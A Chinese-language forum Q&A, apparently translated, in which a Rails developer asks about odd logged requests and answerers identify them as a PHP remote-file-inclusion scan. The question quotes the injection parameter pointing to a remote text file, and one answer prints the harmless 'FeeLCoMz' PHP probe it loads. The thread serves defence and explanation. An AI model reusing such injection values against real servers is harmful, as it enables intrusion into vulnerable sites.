来自韩国网站的奇怪请求

来自韩国网站的奇怪请求

最近我发现我的 rails 应用程序出现了很多类似的奇怪请求:

Processing ApplicationController#index (for 189.30.242.61 at 2009-12-14 07:38:24) [GET]
  Parameters: {"_SERVER"=>{"DOCUMENT_ROOT"=>"http://www.usher.co.kr/bbs/id1.txt???"}}

ActionController::RoutingError (No route matches "/browse/brand/nike  ///" with {:method=>:get}):

它看起来像是自动化的,因为我收到了很多,并注意到它们试图发送的奇怪参数:

_SERVER"=>{"DOCUMENT_ROOT"=>"http://www.usher.co.kr/bbs/id1.txt???

这是恶意的吗?如果是,我该怎么办?

答案1

如果你在韩国服务器上打开参考文档(我可能不应该这样做,但我这样做了;)它显示:

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

在网上搜索后发现,这似乎是针对 Joomla、Wordpress 和/或 Firestats 的漏洞(不同网站提及的目标不同)。如果您正在运行其中任何一个,请确保升级到最新版本。

更多信息请点击这里:http://urbanoalvarez.es/blog/2009/09/24/feelcomz-rfi/和这里:http://tech.sweetnam.eu/2009/06/firestats-wordpress-exploit/

答案2

这不是一个漏洞:它只是试图找到允许替换$_SERVER['DOCUMENT_ROOT']PHP 变量的易受攻击的服务器。

工作原理如下:如果服务器存在漏洞,则会在页面上打印“FeeLCoMz”。发送请求的脚本会检测到它,并将该网站添加到服务器数据库中,这些服务器很快就会成为自豪的僵尸网络成员 :)

答案3

Sean Earp 上面粘贴的代码只是一个测试代码,用于查看您的系统是否易受攻击。然后,如果您的系统易受攻击,主要攻击就会到来。您的系统处于攻击者的控制之下。攻击者将您的系统变成他的朋友的 IRC 服务器,并与其他人共享您的所有文件。或将您的系统用作攻击其他 IP 号码的受害者。或删除您的所有信息,或窃取您的密码,或伪造您的客户端数据等。有一篇文章远程代码注入攻击的剖析 其中给出了一些真实攻击代码的示例。

我也关注了一段时间,想知道 FeelComz 是谁。我发现一个穷困的印度尼西亚孩子整天整夜地在 irc 网站上玩游戏。他在一个名为 Friendster 的印度尼西亚网站上有一个个人页面。他似乎在感谢你在海啸后对他的国家提供的援助。

相关内容